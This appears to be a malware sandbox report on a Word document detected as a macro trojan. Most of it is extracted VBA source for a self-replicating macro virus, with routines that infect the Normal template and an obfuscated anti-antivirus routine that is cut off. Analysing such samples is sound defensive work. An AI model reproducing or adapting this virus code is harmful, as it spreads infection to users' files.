Verdict: MALICIOUS
Risk Score: 80

Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Moothi-1'. Static analysis revealed the presence of VBA macros within the document. These macros are highly likely to be responsible for downloading and executing a secondary malicious payload, a common tactic for this type of threat.
Heuristics (2)
- ClamAV: Doc.Trojan.Moothi-1 (severity: critical, rule CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Moothi-1
- VBA macros detected (severity: medium, rule OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23897 bytes | 3993c346e52e1e5b256a785b587cffd636e7b9a2d8fbe01391f2c95cd6df12d8 |
Preview script (first 1,000 lines of the extracted script; the dump below is shown as carved from the sample, with the original line breaks restored and the banner comments' spacing as recovered by the extractor):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
' __ __
' | | | |
' _|__|_|__|_ ____ ____ _________ _________ _________ ____ ____ ___ ________
'/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
'| ________| | \ / | | ___ | | ___ | | | | | | | | | | _____/
'| | | \/ | | / \ | | / \ | | | | | | | \___/ | |
'| |________ | | | | | | | | | | |__ __| | |_| | ___ | |__
'| \ | | | | | | | | | | | | | | | | | |
'|______ | | |\ /| | | | | | | | | | | | | _ | | | | __|
' | | | | \/ | | | | | | | | | | | | | | | | | | | |
' ______| | | | | | | \___/ | | \___/ | | | | | | | | | | |____
'| | | | | | | | | | | | | | | | | | | \
'\___________/ \____/ \____/ \_________/ \_________/ \___/ \____/ \____/ \___/ \________/
' | | | | - $MOOTHiE Da HuStla [ZeroGravity]
' |__| |__| - August 15, 2000
'
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'Virus Creation: 09/09/00 13.39.36 $*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'$* Poly = Yes $*
'$* Retro = Yes $*
'$* Stealth = High $*
'$* Infection = New $*
'$* Payload = Save $*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$ |-----====== CODE Starts ======-----|
Private Sub Document_New()
On Error Resume Next
Call Poly1
'Author: Doctor Rave
'Name: Birgit2001
'Comments: This is not a troja
'Origin: Germany
'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0
On Error Resume Next: Randomize
Dim XXX1 As Object, XXX2 As Object, XXX3 As Object, XXX4 As Object, XXX5 As Object
Dim YYY1 As Object, YYY2 As Object, YYY3 As Object, YYY4 As Object, YYY5 As Object
Set XXX1 = ActiveDocument: Set XXX2 = XXX1.VBProject: Set XXX3 = XXX2.VBComponents: Set XXX4 = XXX3.Item(1): Set XXX5 = XXX4.CodeModule
Set YYY1 = NormalTemplate: Set YYY2 = YYY1.VBProject: Set YYY3 = YYY2.VBComponents: Set YYY4 = YYY3.Item(1): Set YYY5 = YYY4.CodeModule
AAA = YYY5.CountOfLines: BBB = XXX5.CountOfLines: CCC = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If AAA < BBB Then
For XXX = 1 To AAA: NT5.replaceline XXX, CCC: Next XXX
For XXX = 1 To BBB: XXXA = XXX5.Lines(XXX, 1): YYY5.Insertlines XXX, XXXA: Next XXX
NormalTemplate.Save: End If
If BBB < AAA Then
For XXX = 1 To BBB: XXX5.replaceline XXX, CCC: Next XXX
For XXX = 1 To AAA: XXXA = YYY5.Lines(XXX, 1): XXX5.Insertlines XXX, XXXA: Next XXX
ActiveDocument.Save: End If
Call Retro
End Sub
Sub FileSave()
On Error Resume Next
MsgBox "You have been infected by the Birgit2001 virus!"
ActiveDocument.Save 'Actual Save Command
End Sub
Private Sub Retro()
On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr( ... (truncated)
```